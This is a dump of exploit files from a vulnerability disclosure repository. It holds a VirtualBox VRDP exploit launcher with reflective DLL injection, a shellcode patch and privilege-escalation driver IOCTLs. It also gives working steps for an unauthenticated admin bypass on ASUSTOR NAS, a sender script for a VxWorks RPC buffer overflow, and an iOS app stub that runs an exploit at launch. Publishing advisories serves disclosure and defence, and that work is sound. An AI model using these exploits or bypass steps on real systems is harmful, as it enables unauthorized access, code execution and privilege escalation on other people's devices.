3736/exploit/poc_vrdpexploit/vrdpexploit/vrdpexploit.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/hostid_hijacker/ReflectiveDll.c: -------------------------------------------------------------------------------- 1 | //===============================================================================================// 2 | // This is a stub for the actuall functionality of the DLL. 3 | //===============================================================================================// 4 | #include "ReflectiveLoader.h" 5 | 6 | // Note: REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR and REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN are 7 | // defined in the project properties (Properties->C++->Preprocessor) so as we can specify our own 8 | // DllMain and use the LoadRemoteLibraryR() API to inject this DLL. 9 | 10 | // You can use this value as a pseudo hinstDLL value (defined and set via ReflectiveLoader.c) 11 | extern HINSTANCE hAppInstance; 12 | extern VOID HijackHostId(PVOID launcherProcessMemory); 13 | //===============================================================================================// 14 | BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) 15 | { 16 | BOOL bReturnValue = TRUE; 17 | switch (dwReason) 18 | { 19 | case DLL_QUERY_HMODULE: 20 | if (lpReserved != NULL) 21 | *(HMODULE *)lpReserved = hAppInstance; 22 | break; 23 | case DLL_PROCESS_ATTACH: 24 | hAppInstance = hinstDLL; 25 | //MessageBoxA(NULL, "Hello from DllMain!", "Reflective Dll Injection", MB_OK); 26 | HijackHostId(lpReserved); 27 | break; 28 | case DLL_PROCESS_DETACH: 29 | case DLL_THREAD_ATTACH: 30 | case DLL_THREAD_DETACH: 31 | break; 32 | } 33 | return bReturnValue; 34 | } -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/hostid_hijacker/ReflectiveDllInjection.h: -------------------------------------------------------------------------------- 1 | //===============================================================================================// 2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) 3 | // All rights reserved. 4 | // 5 | // Redistribution and use in source and binary forms, with or without modification, are permitted 6 | // provided that the following conditions are met: 7 | // 8 | // * Redistributions of source code must retain the above copyright notice, this list of 9 | // conditions and the following disclaimer. 10 | // 11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of 12 | // conditions and the following disclaimer in the documentation and/or other materials provided 13 | // with the distribution. 14 | // 15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to 16 | // endorse or promote products derived from this software without specific prior written permission. 17 | // 18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND 20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 26 | // POSSIBILITY OF SUCH DAMAGE. 27 | //===============================================================================================// 28 | #ifndef _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H 29 | #define _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H 30 | //===============================================================================================// 31 | #define WIN32_LEAN_AND_MEAN 32 | #include 33 | 34 | // we declare some common stuff in here... 35 | 36 | #define DLL_QUERY_HMODULE 6 37 | 38 | #define DEREF( name )*(UINT_PTR *)(name) 39 | #define DEREF_64( name )*(DWORD64 *)(name) 40 | #define DEREF_32( name )*(DWORD *)(name) 41 | #define DEREF_16( name )*(WORD *)(name) 42 | #define DEREF_8( name )*(BYTE *)(name) 43 | 44 | typedef ULONG_PTR(WINAPI * REFLECTIVELOADER)(VOID); 45 | typedef BOOL(WINAPI * DLLMAIN)(HINSTANCE, DWORD, LPVOID); 46 | 47 | #define DLLEXPORT __declspec( dllexport ) 48 | 49 | //===============================================================================================// 50 | #endif 51 | //===============================================================================================// 52 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/hostid_hijacker/Shellcode.asm: -------------------------------------------------------------------------------- 1 | PUBLIC Shellcode 2 | 3 | EXTERN gHostId: DWORD 4 | EXTERN RestoreBytes: PROC 5 | 6 | .CODE 7 | 8 | Shellcode PROC 9 | 10 | ; We should preserve all the registers because it's not known 11 | ; what of them will be used in RestoreBytes() 12 | push rax 13 | push rbx 14 | push rcx 15 | push rdx 16 | push rsi 17 | push rdi 18 | push r8 19 | push r9 20 | push r10 21 | push r11 22 | push r12 23 | push r13 24 | push r14 25 | push r15 26 | 27 | ; IDirect3DSurface9* pSrcSurfIf = [rsp + 0260h] 28 | ; We add 8 to because the shellcode is call'ed by the patch 29 | ; We also add 112 to account all the push'es (8 * 14) 30 | mov rax, qword ptr [rsp + 0260h + 08h + 070h]; 31 | 32 | ; wined3d_surface* surface = ((d3d9_surface*)pSrcSurfIf)->wined3d_surface 33 | mov rax, qword ptr [rax + 010h] 34 | 35 | ; uint32_t hostId = surface->texture_name 36 | mov eax, dword ptr [rax + 0F4h] 37 | 38 | ; Save Host ID 39 | mov dword ptr [gHostId], eax 40 | 41 | ; Replace the patch with original bytes so the shellcode will not be called anymore 42 | call RestoreBytes 43 | 44 | pop r15 45 | pop r14 46 | pop r13 47 | pop r12 48 | pop r11 49 | pop r10 50 | pop r9 51 | pop r8 52 | pop rdi 53 | pop rsi 54 | pop rdx 55 | pop rcx 56 | pop rbx 57 | pop rax 58 | 59 | ret 60 | 61 | Shellcode ENDP 62 | 63 | END -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/hostid_hijacker/hostid_hijacker.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | Source Files 23 | 24 | 25 | Source Files 26 | 27 | 28 | Source Files 29 | 30 | 31 | Source Files 32 | 33 | 34 | 35 | 36 | Header Files 37 | 38 | 39 | Header Files 40 | 41 | 42 | 43 | 44 | Source Files 45 | 46 | 47 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/hostid_hijacker/hostid_hijacker.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/vrdpexploit_launcher.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.27428.2005 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "vrdpexploit_launcher", "vrdpexploit_launcher\vrdpexploit_launcher.vcxproj", "{BE8BC74D-5981-4C66-8332-0C79ACE67A15}" 7 | EndProject 8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "hostid_hijacker", "hostid_hijacker\hostid_hijacker.vcxproj", "{0414DEEB-8C9A-4AA3-B77E-BFDB82DC9E4C}" 9 | EndProject 10 | Global 11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 12 | Debug|x64 = Debug|x64 13 | Debug|x86 = Debug|x86 14 | Release|x64 = Release|x64 15 | Release|x86 = Release|x86 16 | EndGlobalSection 17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 18 | {BE8BC74D-5981-4C66-8332-0C79ACE67A15}.Debug|x64.ActiveCfg = Debug|x64 19 | {BE8BC74D-5981-4C66-8332-0C79ACE67A15}.Debug|x64.Build.0 = Debug|x64 20 | {BE8BC74D-5981-4C66-8332-0C79ACE67A15}.Debug|x86.ActiveCfg = Debug|Win32 21 | {BE8BC74D-5981-4C66-8332-0C79ACE67A15}.Debug|x86.Build.0 = Debug|Win32 22 | {BE8BC74D-5981-4C66-8332-0C79ACE67A15}.Release|x64.ActiveCfg = Release|x64 23 | {BE8BC74D-5981-4C66-8332-0C79ACE67A15}.Release|x64.Build.0 = Release|x64 24 | {BE8BC74D-5981-4C66-8332-0C79ACE67A15}.Release|x86.ActiveCfg = Release|Win32 25 | {BE8BC74D-5981-4C66-8332-0C79ACE67A15}.Release|x86.Build.0 = Release|Win32 26 | {0414DEEB-8C9A-4AA3-B77E-BFDB82DC9E4C}.Debug|x64.ActiveCfg = Debug|x64 27 | {0414DEEB-8C9A-4AA3-B77E-BFDB82DC9E4C}.Debug|x64.Build.0 = Debug|x64 28 | {0414DEEB-8C9A-4AA3-B77E-BFDB82DC9E4C}.Debug|x86.ActiveCfg = Debug|Win32 29 | {0414DEEB-8C9A-4AA3-B77E-BFDB82DC9E4C}.Debug|x86.Build.0 = Debug|Win32 30 | {0414DEEB-8C9A-4AA3-B77E-BFDB82DC9E4C}.Release|x64.ActiveCfg = Release|x64 31 | {0414DEEB-8C9A-4AA3-B77E-BFDB82DC9E4C}.Release|x64.Build.0 = Release|x64 32 | {0414DEEB-8C9A-4AA3-B77E-BFDB82DC9E4C}.Release|x86.ActiveCfg = Release|Win32 33 | {0414DEEB-8C9A-4AA3-B77E-BFDB82DC9E4C}.Release|x86.Build.0 = Release|Win32 34 | EndGlobalSection 35 | GlobalSection(SolutionProperties) = preSolution 36 | HideSolutionNode = FALSE 37 | EndGlobalSection 38 | GlobalSection(ExtensibilityGlobals) = postSolution 39 | SolutionGuid = {6212740A-BF6E-48E0-9BD4-FC50CE875A0E} 40 | EndGlobalSection 41 | EndGlobal 42 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/vrdpexploit_launcher/GetProcAddressR.h: -------------------------------------------------------------------------------- 1 | //===============================================================================================// 2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) 3 | // All rights reserved. 4 | // 5 | // Redistribution and use in source and binary forms, with or without modification, are permitted 6 | // provided that the following conditions are met: 7 | // 8 | // * Redistributions of source code must retain the above copyright notice, this list of 9 | // conditions and the following disclaimer. 10 | // 11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of 12 | // conditions and the following disclaimer in the documentation and/or other materials provided 13 | // with the distribution. 14 | // 15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to 16 | // endorse or promote products derived from this software without specific prior written permission. 17 | // 18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND 20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 26 | // POSSIBILITY OF SUCH DAMAGE. 27 | //===============================================================================================// 28 | #ifndef _REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H 29 | #define _REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H 30 | //===============================================================================================// 31 | #include "ReflectiveDLLInjection.h" 32 | 33 | FARPROC WINAPI GetProcAddressR(HANDLE hModule, LPCSTR lpProcName); 34 | //===============================================================================================// 35 | #endif 36 | //===============================================================================================// 37 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/vrdpexploit_launcher/LoadLibraryR.h: -------------------------------------------------------------------------------- 1 | //===============================================================================================// 2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) 3 | // All rights reserved. 4 | // 5 | // Redistribution and use in source and binary forms, with or without modification, are permitted 6 | // provided that the following conditions are met: 7 | // 8 | // * Redistributions of source code must retain the above copyright notice, this list of 9 | // conditions and the following disclaimer. 10 | // 11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of 12 | // conditions and the following disclaimer in the documentation and/or other materials provided 13 | // with the distribution. 14 | // 15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to 16 | // endorse or promote products derived from this software without specific prior written permission. 17 | // 18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND 20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 26 | // POSSIBILITY OF SUCH DAMAGE. 27 | //===============================================================================================// 28 | #ifndef _REFLECTIVEDLLINJECTION_LOADLIBRARYR_H 29 | #define _REFLECTIVEDLLINJECTION_LOADLIBRARYR_H 30 | //===============================================================================================// 31 | #include "ReflectiveDLLInjection.h" 32 | 33 | DWORD GetReflectiveLoaderOffset(VOID * lpReflectiveDllBuffer); 34 | 35 | HMODULE WINAPI LoadLibraryR(LPVOID lpBuffer, DWORD dwLength); 36 | 37 | HANDLE WINAPI LoadRemoteLibraryR(HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter); 38 | 39 | //===============================================================================================// 40 | #endif 41 | //===============================================================================================// 42 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/vrdpexploit_launcher/Main.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/vrdpexploit_launcher/Main.c -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/vrdpexploit_launcher/Process.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | DWORD 6 | GetPidByName(PCHAR name) { 7 | PROCESSENTRY32 entry; 8 | entry.dwSize = sizeof(PROCESSENTRY32); 9 | 10 | HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 11 | if (Process32First(snapshot, &entry)) { 12 | do { 13 | if (!_stricmp(entry.szExeFile, name)) { 14 | DWORD pid = entry.th32ProcessID; 15 | printf("[*] PID: %d\n", pid); 16 | return pid; 17 | } 18 | } while (Process32Next(snapshot, &entry)); 19 | } 20 | 21 | printf("[-] Failed to get PID of %s\n", name); 22 | return 0; 23 | } 24 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/vrdpexploit_launcher/ReflectiveDLLInjection.h: -------------------------------------------------------------------------------- 1 | //===============================================================================================// 2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) 3 | // All rights reserved. 4 | // 5 | // Redistribution and use in source and binary forms, with or without modification, are permitted 6 | // provided that the following conditions are met: 7 | // 8 | // * Redistributions of source code must retain the above copyright notice, this list of 9 | // conditions and the following disclaimer. 10 | // 11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of 12 | // conditions and the following disclaimer in the documentation and/or other materials provided 13 | // with the distribution. 14 | // 15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to 16 | // endorse or promote products derived from this software without specific prior written permission. 17 | // 18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND 20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 26 | // POSSIBILITY OF SUCH DAMAGE. 27 | //===============================================================================================// 28 | #ifndef _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H 29 | #define _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H 30 | //===============================================================================================// 31 | #define WIN32_LEAN_AND_MEAN 32 | #include 33 | 34 | // we declare some common stuff in here... 35 | 36 | #define DLL_METASPLOIT_ATTACH 4 37 | #define DLL_METASPLOIT_DETACH 5 38 | #define DLL_QUERY_HMODULE 6 39 | 40 | #define DEREF( name )*(UINT_PTR *)(name) 41 | #define DEREF_64( name )*(DWORD64 *)(name) 42 | #define DEREF_32( name )*(DWORD *)(name) 43 | #define DEREF_16( name )*(WORD *)(name) 44 | #define DEREF_8( name )*(BYTE *)(name) 45 | 46 | typedef ULONG_PTR(WINAPI * REFLECTIVELOADER)(VOID); 47 | typedef BOOL(WINAPI * DLLMAIN)(HINSTANCE, DWORD, LPVOID); 48 | 49 | #define DLLEXPORT __declspec( dllexport ) 50 | 51 | //===============================================================================================// 52 | #endif 53 | //===============================================================================================// 54 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/vrdpexploit_launcher/_Constants.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | /****************************************************************************** 4 | * Exploit's contants - if something not works, consider to review them 5 | ******************************************************************************/ 6 | 7 | /********** Launcher constants **********/ 8 | 9 | CHAR gDriverName[] = "vrdpexploit.sys"; 10 | CHAR gDeviceName[] = "\\??\\vrdpexploit"; 11 | DWORD gIoctlEscalate = CTL_CODE(0x8000, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS); /* 0x80002000 */ 12 | DWORD gIoctlExploit = CTL_CODE(0x8000, 0x801, METHOD_BUFFERED, FILE_ANY_ACCESS); /* 0x80002004 */ 13 | 14 | CHAR gDwmName[] = "dwm.exe"; 15 | CHAR gHijackerName[] = "hostid_hijacker.dll"; 16 | CHAR gSuspendCommand[] = "pssuspend64.exe -nobanner dwm.exe"; 17 | CHAR gResumeCommand[] = "pssuspend64.exe -nobanner -r dwm.exe"; 18 | 19 | /********** Host ID Hijacker constants **********/ 20 | 21 | CHAR launcherProcessName[] = "vrdpexploit_launcher.exe"; 22 | 23 | BYTE gPatch[] = 24 | "\xE8\x00\x00\x00\x00" // call $5 25 | "\x58" // pop rax 26 | "\x48\x83\xE8\x05" // sub rax, 5 27 | "\x50" // push rax 28 | "\x48\xB8\x41\x41\x41\x41\x41\x41\x41\x41" // mov rax, 0x4141414141414141 29 | "\x50" // push rax 30 | "\xC3"; // ret 31 | 32 | // Workaround to define a "constant" instead of #define PATCH_SIZE 33 | // in several files. 34 | enum patch_size { 35 | patchSize = 23, 36 | }; 37 | enum patch_size gPatchSize = patchSize; 38 | 39 | // Offset from gPatch to a shellcode address of command "mov rax, ..." 40 | ULONGLONG gPatchShellcodeAddrOffset = ???; // Removed for the sake of PoC 41 | 42 | // Offset inside vboxWddmDDevPresent where gPatch will be copied 43 | ULONGLONG gPatchOffset = ???; // Removed for the sake of PoC 44 | 45 | BYTE gSavedBytes[patchSize]; 46 | 47 | const DWORD gLastValidHostId = 100; 48 | 49 | /****************************************************************************** 50 | * End of exploit's contants 51 | ******************************************************************************/ 52 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/vrdpexploit_launcher/vrdpexploit_launcher.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | Header Files 23 | 24 | 25 | 26 | 27 | Source Files 28 | 29 | 30 | Source Files 31 | 32 | 33 | Header Files 34 | 35 | 36 | Source Files 37 | 38 | 39 | Source Files 40 | 41 | 42 | Source Files 43 | 44 | 45 | Source Files 46 | 47 | 48 | Source Files 49 | 50 | 51 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/vrdpexploit_launcher/vrdpexploit_launcher.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /SSD Advisory - 3747/readme.md: -------------------------------------------------------------------------------- 1 | **Vulnerability Summary**
2 | An ASUSTOR NAS or network attached storage is “a computer appliance built from the ground up for storing and serving files. It attaches directly to a network, allowing those on the network to access and share files from a central location”. In the following advisory we will discuss a vulnerability found inside ASUSTOR NAS which lets anonymous attackers bypass authentication requirement of the product. 3 | 4 | **Credit**
5 | An independent security researcher, Ahmed Y. Elmogy, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program. 6 | 7 | **Affected systems**
8 | ASUSTOR NAS devices running ADM version 3.0.5.RDU1 and prior 9 | 10 | **Vulnerability Details**
11 | The vulnerability lies in the web interface of ASUSTOR NAS, in the file located in /initial/index.cgi, which responsible for initializing the device with your ASUSTOR ID. The problem is that this file is always available even after the first initialization, and it doesn’t require any authentication at all. 12 | So by abusing /initial/index.cgi?act=register, you’ll be logged in with the administrator privileges without any kind of authentication. 13 | 14 | **How to Exploit**
15 | Visit:
16 | `http://:/initial/index.cgi?act=register`
17 | (Port will probably be 8800)
18 | Check “Register later”, click on next, and press the “Start” button. You’ll be redirected to /portal/index.cgi with a sid parameter, bypassing the authentication, and accessing the web interface with admin privileges. 19 | -------------------------------------------------------------------------------- /SSD Advisory - 3904/readme.md: -------------------------------------------------------------------------------- 1 | **Vulnerability Summary**
2 | The following advisory describes a vulnerability found in the Remote Procedure Call (RPC) component of the VxWorks real-time Opearting System, which suffers from a buffer overflow, this buffer overflow can be exploited to cause the component to execute arbitrary code. 3 | 4 | **CVE**
5 | CVE-2019-9865 6 | 7 | **Credit**
8 | An independent Security Researcher, Yu Zhou, has reported this vulnerability to SSD Secure Disclosure program. 9 | 10 | **Affected systems**
11 | VxWorks OS version 6.6 12 | 13 | **Vendor Response**
14 | “We’ve gone through our supported versions of VxWorks and found the versions affected are 6.9 before 6.9.1. We released the update to our customers today. Except in special circumstances, we only release statements and fixes for supported products. We know you found this vulnerability in an unsupported version of VxWorks. We won’t have a code update for that, but a mitigation is to disable CONFIG_RPC. This will be published in NVD as CVE-2019-9865. It should be public shortly. Thank you for working with us to resolve this problem. We hope to work with you in the future if you have found other vulnerabilities, and we may have other questions for you.” 15 | 16 | **Vulnerability Details**
17 | As previously mentioned, the vulnerability is inside the RPC component. The vulnerable function which contains the buffer overflow is _svcauth_unix. At _svcauth_unix + 0x67, will get the value 0xffffffff from the malicious packet (content will be viewed later). 18 | 19 | 20 | 21 | Afterwards, in the cmp eax, 0FFh it will check whether the value (packet content size) is greater than 255 without considering the option of a negative value. The value 0xffffffff is used as the third parameter (nbytes) of the bcopy function, which will finaly cause a buffer overflow. 22 | 23 | 24 | 25 | This is the packet that will be sent to the RPC Service: 26 | 27 | 28 | 29 | **Exploit**
30 | ```python 31 | import socket 32 | 33 | host = "192.168.15.199" 34 | rpcPort = 111 35 | 36 | f = open("pkt", 'rb') # pkt is the file which contains the payload to send. 37 | data = f.read() 38 | f.close() 39 | 40 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 41 | sock.connect((host, rpcPort)) 42 | sock.send(data) 43 | sock.close() 44 | ``` 45 | 46 | 47 | -------------------------------------------------------------------------------- /SSD Advisory - 3944/powend (code)/AppDelegate.h: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.h 3 | // powend 4 | // 5 | // Created by simo on 30/08/2018. 6 | // Copyright © 2018 simo ghannam. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface AppDelegate : UIResponder 12 | 13 | @property (strong, nonatomic) UIWindow *window; 14 | 15 | 16 | @end 17 | 18 | -------------------------------------------------------------------------------- /SSD Advisory - 3944/powend (code)/AppDelegate.m: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.m 3 | // powend 4 | // 5 | // Created by simo on 30/08/2018. 6 | // Copyright © 2018 simo ghannam. All rights reserved. 7 | // 8 | 9 | #import "AppDelegate.h" 10 | #import "code.h" 11 | 12 | @interface AppDelegate () 13 | 14 | @end 15 | 16 | @implementation AppDelegate 17 | 18 | 19 | - (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions { 20 | // Override point for customization after application launch. 21 | //do_powend(); 22 | start_exploit(); 23 | return YES; 24 | } 25 | 26 | 27 | - (void)applicationWillResignActive:(UIApplication *)application { 28 | // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state. 29 | // Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game. 30 | } 31 | 32 | 33 | - (void)applicationDidEnterBackground:(UIApplication *)application { 34 | // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later. 35 | // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits. 36 | } 37 | 38 | 39 | - (void)applicationWillEnterForeground:(UIApplication *)application { 40 | // Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background. 41 | } 42 | 43 | 44 | - (void)applicationDidBecomeActive:(UIApplication *)application { 45 | // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface. 46 | } 47 | 48 | 49 | - (void)applicationWillTerminate:(UIApplication *)application { 50 | // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:. 51 | } 52 | 53 | 54 | @end 55 | -------------------------------------------------------------------------------- /SSD Advisory - 3944/powend (code)/Assets.xcassets/AppIcon.appiconset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "iphone", 5 | "size" : "20x20", 6 | "scale" : "2x" 7 | }, 8 | { 9 | "idiom" : "iphone", 10 | "size" : "20x20", 11 | "scale" : "3x" 12 | }, 13 | { 14 | "idiom" : "iphone", 15 | "size" : "29x29", 16 | "scale" : "2x" 17 | }, 18 | { 19 | "idiom" : "iphone", 20 | "size" : "29x29", 21 | "scale" : "3x" 22 | }, 23 | { 24 | "idiom" : "iphone", 25 | "size" : "40x40", 26 | "scale" : "2x" 27 | }, 28 | { 29 | "idiom" : "iphone", 30 | "size" : "40x40", 31 | "scale" : "3x" 32 | }, 33 | { 34 | "idiom" : "iphone", 35 | "size" : "60x60", 36 | "scale" : "2x" 37 | }, 38 | { 39 | "idiom" : "iphone", 40 | "size" : "60x60", 41 | "scale" : "3x" 42 | }, 43 | { 44 | "idiom" : "ipad", 45 | "size" : "20x20", 46 | "scale" : "1x" 47 | }, 48 | { 49 | "idiom" : "ipad", 50 | "size" : "20x20", 51 | "scale" : "2x" 52 | }, 53 